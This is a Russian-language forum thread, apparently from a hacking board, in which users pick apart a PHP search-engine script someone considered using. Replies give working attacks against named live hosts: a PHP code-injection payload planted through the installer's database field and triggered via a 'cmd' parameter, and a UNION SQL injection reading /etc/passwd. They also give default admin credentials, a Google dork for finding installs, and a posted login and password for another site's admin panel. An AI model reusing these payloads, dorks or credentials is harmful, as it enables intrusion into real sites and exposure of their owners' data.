народ мне нужно ваше мнение стоит ли использовать вот http://magicsearch.pp.ua cms вот ДЕМО ой сори эт наверно не cms а скрипт
По ссылке даже не переходил, но уже одно то, что сайт на фришном домене, дает как минимум 50%, что это какая-то хренатень.
Oops.. Need: magic_quotes =Off install.php PHP: [...] if(isset($_POST['go_ed'])) { if (!is_writable("settings/database.php")) { print "<p style='color:#FF0033'><strong>Файла database.php несуществует или незаданы права доступа 666</strong></p>"; } else { $fhandle=fopen("settings/database.php","w"); fwrite($fhandle,"<?php \n"); fwrite($fhandle,"/***********************\n Файл БД\n***********************/\n"); fwrite($fhandle,"$"."database = '". $_POST['_database']. "';\n"); fwrite($fhandle,"$"."mysql_user = '".$_POST['_mysql_user']. "';\n"); fwrite($fhandle,"$"."mysql_password = '".$_POST['_mysql_password']. "';\n"); fwrite($fhandle,"$"."mysql_host = '".$_POST['_mysql_host']. "';\n"); fwrite($fhandle,"$"."mysql_table_prefix = '".$_mysql_table_prefix. "';\n\n\n"); [....] Заходим на install.php И в поле "Сервер MySQL": Code: '; eval($_GET['cmd']); exit(); /** http://23rus.sytes.net/settings/database.php?cmd=phpinfo(); UPD: Смотрю ты уже снес все к чертям)
http://23rus.sytes.net/static.php?str='+and+1=2+union+select+1,2,concat_ws(0x3a,version(),user(),database()),LOAD_FILE('/etc/passwd')+--+ Сноси в общем. Код писала курица. p.s. не юзай юзера root. у него FILE_PRIV как минимум включен, и имеет он доступ ко всем базам данных.
на многих сайтах логин/пароль - moders админка - /admin/ Google Dork:"Created by Kiria-Studio" http://search.afu-time.com/admin/index.php - sorokin96:25101996 (не тот ли это кирил - разработчик? )
нет и это и не сиэмс вовсе просто я не так выразился !!! а скрипт поисковой системы та и вобщемто я его удалил уже !!!! щас виртуальными серверами занимаюсь